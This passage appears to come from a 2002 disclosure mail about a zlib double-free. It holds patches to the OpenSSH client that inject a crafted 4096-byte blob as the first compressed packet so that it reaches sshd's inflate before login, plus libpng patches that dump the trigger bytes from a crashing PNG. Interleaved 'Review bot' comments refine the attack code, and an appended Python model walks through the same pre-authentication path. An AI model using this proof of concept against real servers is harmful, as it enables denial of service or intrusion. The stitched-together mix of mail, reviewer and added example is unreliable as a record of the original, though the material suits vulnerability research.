+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd";
 /*
  * Initializes compression; level is compression level from 1 to 9
  * (as in gzip).
  */
 
+
+
+
+void dump_hex (char *buf, int len, char *title)
+{
+    int x;
+    int y;
+    unsigned char *ptr;
+    
+    fprintf(stderr, "[ %s - 0x%.8x - %d ]\n", title, buf, len);
+    y = 0;
+    ptr = buf;
+    for(x=0;x<len;x++)
+    {
+        if(y > 10) { y = 0; fprintf(stderr, "\"\n\""); }
+        fprintf(stderr, "\\x%.2x", *ptr);
+        y++;
+        ptr++;
+    }
+    fprintf(stderr, "\n\n"); 
+
+}
+
 void
 buffer_compress_init_send(int level)
 {
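Review bot: dump_hex prints the buffer address with "0x%.8x" and the length with "%d" from an int; passing a pointer for %x is undefined behaviour and truncates the address on 64-bit builds, so use %p (and a size_t length with %zu). The "char *buf" parameter also does not match the unsigned char data it is called with (boomij), which will produce sign-conversion warnings. The string literal is 240 lines of 17 bytes plus a final line of 16, i.e. exactly 4096 bytes, which is what the later buffer_append(output_buffer, boomij, 4096) silently depends on; a named length constant, or declaring boomij as an array and using sizeof(boomij) - 1, would make that coupling explicit instead of relying on hand-counting the lines.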
@@ -63,7 +329,10 @@
 	    incoming_stream.total_out == 0 ? 0.0 :
 	    (double) incoming_stream.total_in / incoming_stream.total_out);
 	if (compress_init_recv_called == 1)
+    {
+        fprintf(stderr, "Calling inflateEnd\n");
 		inflateEnd(&incoming_stream);
+    }
 	if (compress_init_send_called == 1)
 		deflateEnd(&outgoing_stream);
 }
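Review bot: the trace only fires when compress_init_recv_called == 1, so if the daemon's fatal path never sets that flag, or never reaches buffer_compress_uninit at all, nothing is printed and "inflateEnd ran without crashing" is indistinguishable from "inflateEnd was never called". Log unconditionally at function entry and print the return value of inflateEnd(&incoming_stream); that directly answers the question posed in the mail.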
@@ -82,11 +351,23 @@
 {
 	u_char buf[4096];
 	int status;
-
+    static int cnt = 0;
+    
+    
 	/* This case is not handled below. */
 	if (buffer_len(input_buffer) == 0)
 		return;
 
+    if (cnt == 0)
+    {
+       fprintf(stderr, ">> sending corrupt zlib packet ;)\n");
+       buffer_append(output_buffer, boomij, 4096);
+       dump_hex(boomij, 4096, "boomij");
+       
+       cnt++;
+       return;
+    }
+      
 	/* Input is the contents of the input buffer. */
 	outgoing_stream.next_in = buffer_ptr(input_buffer);
 	outgoing_stream.avail_in = buffer_len(input_buffer);
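Review bot: the early return substitutes boomij for the first packet's compressed output but never feeds that packet through outgoing_stream, so the client's deflate state and the daemon's inflate state diverge from this point on; that is fine for a crash test, but every later packet on the connection will also fail to inflate, so a later failure must not be read as a second trigger. The length 4096 is hard-coded twice here and in the buffer declaration above and has to stay equal to the literal's real size; use one constant. Dumping all 4096 bytes as hex on every run also makes the client output hard to read next to sshd's; consider guarding the dump with a verbosity check.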
@@ -135,6 +416,8 @@
 		incoming_stream.next_out = buf;
 		incoming_stream.avail_out = sizeof(buf);
 
+        dump_hex(buffer_ptr(input_buffer), buffer_len(input_buffer), "incoming");
+        
 		status = inflate(&incoming_stream, Z_PARTIAL_FLUSH);
 		switch (status) {
 		case Z_OK:
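Review bot: the dump sits before inflate() and inside the loop, so the whole remaining input is printed on every iteration, yet the value the mail actually asks about, status, is never logged. Add an fprintf of "inflate returned %d" right after the call (or in the default: branch of the switch) so the -4 claimed in the text can be confirmed from the daemon's own output rather than inferred.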
diff -u -r openssh-3.1p1/sshconnect2.c openssh-3.1p1-zlib/sshconnect2.c
--- openssh-3.1p1/sshconnect2.c	Tue Mar 12 03:33:02 2002
+++ openssh-3.1p1-zlib/sshconnect2.c	Tue Mar 12 03:33:03 2002
@@ -75,9 +75,12 @@
 ssh_kex2(char *host, struct sockaddr *hostaddr)
 {
 	Kex *kex;
-
+    unsigned char testdata[4096];
 	xxx_host = host;
 	xxx_hostaddr = hostaddr;
+    
+    memset(testdata, "A", 4095);
+    testdata[4095] = '\0'; 
 
 	if (options.ciphers == (char *)-1) {
 		log("No valid ciphers for protocol version 2 given, using defaults.");
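Review bot: memset(testdata, "A", 4095) passes a pointer where an int fill value is expected; the buffer is filled with the low byte of the string literal's address, not with 'A'. Write memset(testdata, 'A', 4095). The payload contents do not matter for the injection, which happens in compress.c's buffer_compress, but the compiler warning shows this is not what was intended. The unsigned char array is also passed to packet_put_cstring, which takes a const char *, so expect a second warning there.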
@@ -119,13 +122,14 @@
 	session_id2 = kex->session_id;
 	session_id2_len = kex->session_id_len;
 
-#ifdef DEBUG_KEXDH
+
 	/* send 1st encrypted/maced/compressed message */
+    debug("sending malformed zlib packet...");
 	packet_start(SSH2_MSG_IGNORE);
-	packet_put_cstring("markus");
+	packet_put_cstring(testdata);
 	packet_send();
 	packet_write_wait();
-#endif
+
 	debug("done: ssh_kex2.");
 }
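Review bot: the debug("sending malformed zlib packet...") message is misleading, since nothing in this function malforms anything; the substitution happens in buffer_compress, and the only property this packet needs is a non-empty payload so that buffer_compress does not take its buffer_len(input_buffer) == 0 early return. Dropping the #ifdef DEBUG_KEXDH guard to make the post-kex IGNORE packet unconditional is the intent, so say that in the message, e.g. "sending first compressed packet (payload replaced in buffer_compress)".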
 

Attachment: png_of_doom.png
Description: PNG image

diff -r -u libpng-1.2.1/pngconf.h libpng-1.2.1-zlib-test/pngconf.h
--- libpng-1.2.1/pngconf.h	Tue Mar 12 03:35:20 2002
+++ libpng-1.2.1-zlib-test/pngconf.h	Tue Mar 12 03:35:19 2002
@@ -30,7 +30,7 @@
  */
 
 #ifndef PNG_ZBUF_SIZE
-#  define PNG_ZBUF_SIZE 8192
+#  define PNG_ZBUF_SIZE 4096
 #endif
 
 /* Enable if you want a write-only libpng */
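Review bot: PNG_ZBUF_SIZE is the size of the chunk libpng reads IDAT data into and hands to inflate as input (avail_in; see "idat_size -= zstream.avail_in" in the pngread.c hunk below), whereas the 4096-byte buf in OpenSSH's buffer_uncompress is inflate's output buffer (avail_out). This change therefore matches libpng's input size to OpenSSH's output size; on the OpenSSH side the input size is simply the packet payload length, which the client controls anyway. Harmless for the test, but the mail's remark about "matching" the buffer should say which buffer is meant.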
diff -r -u libpng-1.2.1/pngread.c libpng-1.2.1-zlib-test/pngread.c
--- libpng-1.2.1/pngread.c	Tue Mar 12 03:35:20 2002
+++ libpng-1.2.1-zlib-test/pngread.c	Tue Mar 12 03:35:19 2002
@@ -42,7 +42,9 @@
 #endif
 
    int i;
-
+   int x;
+   char *ptr;
+   
    png_debug(1, "in png_create_read_struct\n");
 #ifdef PNG_USER_MEM_SUPPORTED
    if ((png_ptr = (png_structp)png_create_struct_2(PNG_STRUCT_PNG,
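Review bot: x and ptr are declared in png_create_read_struct but never used in this function (the dump loop was added to png_read_row), so this hunk only adds unused-variable warnings; drop them here.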
@@ -117,6 +119,7 @@
      }
    }
 
+
    /* initialize zbuf - compression buffer */
    png_ptr->zbuf_size = PNG_ZBUF_SIZE;
    png_ptr->zbuf = (png_bytep)png_malloc(png_ptr,
@@ -125,6 +128,8 @@
    png_ptr->zstream.zfree = png_zfree;
    png_ptr->zstream.opaque = (voidpf)png_ptr;
 
+
+   
    switch (inflateInit(&png_ptr->zstream))
    {
      case Z_OK: /* Do nothing */ break;
@@ -134,11 +139,13 @@
      default: png_error(png_ptr, "Unknown zlib error");
    }
 
+
    png_ptr->zstream.next_out = png_ptr->zbuf;
    png_ptr->zstream.avail_out = (uInt)png_ptr->zbuf_size;
 
    png_set_read_fn(png_ptr, png_voidp_NULL, png_rw_ptr_NULL);
 
+   
    return (png_ptr);
 }
 
@@ -523,6 +530,10 @@
    const int png_pass_mask[7] = {0x80, 0x08, 0x88, 0x22, 0xaa, 0x55, 0xff};
 #endif
    int ret;
+   int x;
+   char *ptr;
+   int i;
+   
    png_debug2(1, "in png_read_row (row %lu, pass %d)\n",
       png_ptr->row_number, png_ptr->pass);
    /* save jump buffer and error functions */
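Review bot: "int i;" is declared without an initializer and is first read as the column counter in the dump loop added further down in this function ("if (i > 16)"), so its starting value is whatever was on the stack; initialize it as "int i = 0;". x and ptr are fine here since that loop uses them.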
@@ -669,6 +680,28 @@
             (png_size_t)png_ptr->zstream.avail_in);
          png_ptr->idat_size -= png_ptr->zstream.avail_in;
       }
+      
+    fprintf(stderr, "zbuf_size = %d\n", (uInt)png_ptr->zbuf_size);
+    fprintf(stderr, "input size: %d\n", (uInt)png_ptr->zstream.avail_in);
+    fprintf(stderr, "compression level: %d\n", (uInt)png_ptr->zlib_level);
+
+        
+    ptr = png_ptr->zbuf;
+    for (x=0;x<(uInt)png_ptr->zbuf_size;x++)
+    {
+        if (i > 16)
+        {
+            i =0;
+            fprintf(stderr, "\"\n\"");   
+        }
+
+        fprintf(stderr, "\\x%.2x", (unsigned char ) *ptr);
+        *ptr++;  
+        i++;
+    }
+   fprintf(stderr, "\n\n", png_ptr->zbuf);
+   
+   
       ret = inflate(&png_ptr->zstream, Z_PARTIAL_FLUSH);
       if (ret == Z_STREAM_END)
       {
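Review bot: the loop dumps zbuf_size bytes of zbuf regardless of how many were actually read, but only zstream.avail_in bytes (printed just above as "input size") were filled from the IDAT chunk and will be passed to inflate; if the final IDAT read is shorter than PNG_ZBUF_SIZE, the tail of the dump is stale buffer content that inflate never sees, and the 4096-byte blob carried over to compress.c may end with bytes that play no part in the trigger. Dump avail_in bytes instead, or print both so the transfer can be checked against the daemon's "incoming" dump. Also: "*ptr++;" dereferences and discards the result (just "ptr++;"), fprintf(stderr, "\n\n", png_ptr->zbuf) passes an argument the format string does not use, and the uInt values printed with %d should use %u.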
@@ -1214,6 +1247,9 @@
    png_free(png_ptr, png_ptr->time_buffer);
 #endif
 
+   //fprintf(stderr, "zbuf is at 0x%.8x and is %d bytes\n", &png_ptr->zbuf,&png_ptr->zbuf_size); 
+   
+   
    inflateEnd(&png_ptr->zstream);
 #ifdef PNG_PROGRESSIVE_READ_SUPPORTED
    png_free(png_ptr, png_ptr->save_buffer);
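Review bot: the commented-out fprintf would print &png_ptr->zbuf and &png_ptr->zbuf_size, i.e. the addresses of the struct members, not the buffer's address and size; if it is re-enabled, use png_ptr->zbuf with %p and png_ptr->zbuf_size with a matching unsigned format. Since this inflateEnd is the call pngtest is observed to crash in, it is also worth logging its return value for comparison with the sshd run.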

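The following is an added example, not code from this mail, from OpenSSH or from zlib. It models in Python the path the mail describes: after key exchange an SSH2 client may send SSH2_MSG_IGNORE (message number 2 in RFC 4253) whose payload has already been run through the negotiated "zlib" compression, so the daemon's inflate runs on attacker-chosen bytes before any credential has been checked. Assumptions: packet framing follows RFC 4253 section 6 with encryption and MAC left out; Z_SYNC_FLUSH stands in for the Z_PARTIAL_FLUSH OpenSSH uses (both leave the stream open across packets); the 4096-byte output chunk mirrors the buf[4096] in buffer_uncompress; and the malformed stream used here (a valid zlib header followed by the reserved block type 3) is a constructed stand-in that inflate rejects deterministically, not the double-free trigger from the attached PNG. The header bytes 78 da are the ones a level-9 deflate stream starts with, which is also how the buffer in the compress.c patch begins.

```python
"""Model of the pre-auth compressed-packet path (added example; not from the
mail, OpenSSH or zlib).  Framing per RFC 4253 s6, plaintext only."""
import os
import struct
import zlib

SSH2_MSG_IGNORE = 2                # RFC 4253 message number
ZLIB_HEADER_LEVEL9 = b"\x78\xda"   # deflate, 32K window, FLEVEL=3 (max compression)
INFLATE_OUT_CHUNK = 4096           # size of the output buffer in buffer_uncompress()
# Constructed malformed stream: valid zlib header, then a block header whose
# BTYPE is the reserved value 3.  inflate rejects it; it is NOT the PNG trigger.
BAD_STREAM = ZLIB_HEADER_LEVEL9 + b"\x06"


def ssh_string(data):
    """SSH 'string': uint32 big-endian length + bytes (what packet_put_cstring emits)."""
    return struct.pack(">I", len(data)) + data


def frame_packet(payload, block_size=8):
    """uint32 packet_length, byte padding_length, payload, random padding;
    padding >= 4 bytes and 4 + packet_length is a multiple of block_size."""
    padlen = block_size - (5 + len(payload)) % block_size
    if padlen < 4:
        padlen += block_size
    packet_length = 1 + len(payload) + padlen
    return struct.pack(">IB", packet_length, padlen) + payload + os.urandom(padlen)


def unframe_packet(packet):
    """Inverse of frame_packet; ValueError on inconsistent lengths."""
    if len(packet) < 5:
        raise ValueError("short packet")
    packet_length, padlen = struct.unpack(">IB", packet[:5])
    if 4 + packet_length != len(packet) or padlen < 4:
        raise ValueError("bad framing")
    return packet[5:4 + packet_length - padlen]


class Client:
    """One deflate stream per connection (OpenSSH's outgoing_stream)."""

    def __init__(self, level=9):
        self.deflater = zlib.compressobj(level)

    def ignore_packet(self, data, raw_compressed=None):
        payload = bytes([SSH2_MSG_IGNORE]) + ssh_string(data)
        if raw_compressed is None:
            # Flush per packet so the peer can inflate it; the stream stays open
            # across packets (OpenSSH uses Z_PARTIAL_FLUSH; Z_SYNC_FLUSH here).
            compressed = self.deflater.compress(payload) + self.deflater.flush(zlib.Z_SYNC_FLUSH)
        else:
            # What the compress.c patch does: ship arbitrary bytes in place of
            # this packet's compressed payload.
            compressed = raw_compressed
        return frame_packet(compressed)


class Server:
    """One inflate stream per connection (incoming_stream)."""

    def __init__(self):
        self.inflater = zlib.decompressobj()
        self.authenticated = False   # never consulted before inflate: the exposure

    def inflate_bounded(self, compressed):
        """Inflate in INFLATE_OUT_CHUNK pieces, like buffer_uncompress()'s loop,
        so a high-ratio payload cannot force one huge allocation."""
        out = bytearray()
        data = compressed
        while True:
            chunk = self.inflater.decompress(data, INFLATE_OUT_CHUNK)
            out += chunk
            data = self.inflater.unconsumed_tail
            if not data and len(chunk) < INFLATE_OUT_CHUNK:
                return bytes(out)

    def receive(self, packet):
        """Returns ('ok', msg_type, body) or ('zlib-error', message, None)."""
        compressed = unframe_packet(packet)
        try:
            payload = self.inflate_bounded(compressed)
        except zlib.error as e:
            # OpenSSH calls fatal() at this point; the mail asks what the
            # cleanup (inflateEnd on the stream that just failed) then does.
            return ("zlib-error", str(e), None)
        if not payload:
            return ("zlib-error", "empty payload", None)
        return ("ok", payload[0], bytes(payload[1:]))


if __name__ == "__main__":
    client, server = Client(), Server()
    print(server.receive(client.ignore_packet(b"A" * 4095))[:2])
    print(Server().receive(Client().ignore_packet(b"", raw_compressed=BAD_STREAM)))
```

Running the file shows an ordinary IGNORE packet inflating fine on an unauthenticated Server, and the constructed bad stream reaching zlib and being rejected on the same unauthenticated path. The authenticated flag is deliberately never checked before inflate, because that is the property the mail relies on; later OpenSSH releases closed this window with the delayed "zlib@openssh.com" method, which negotiates compression but does not start it until user authentication has succeeded.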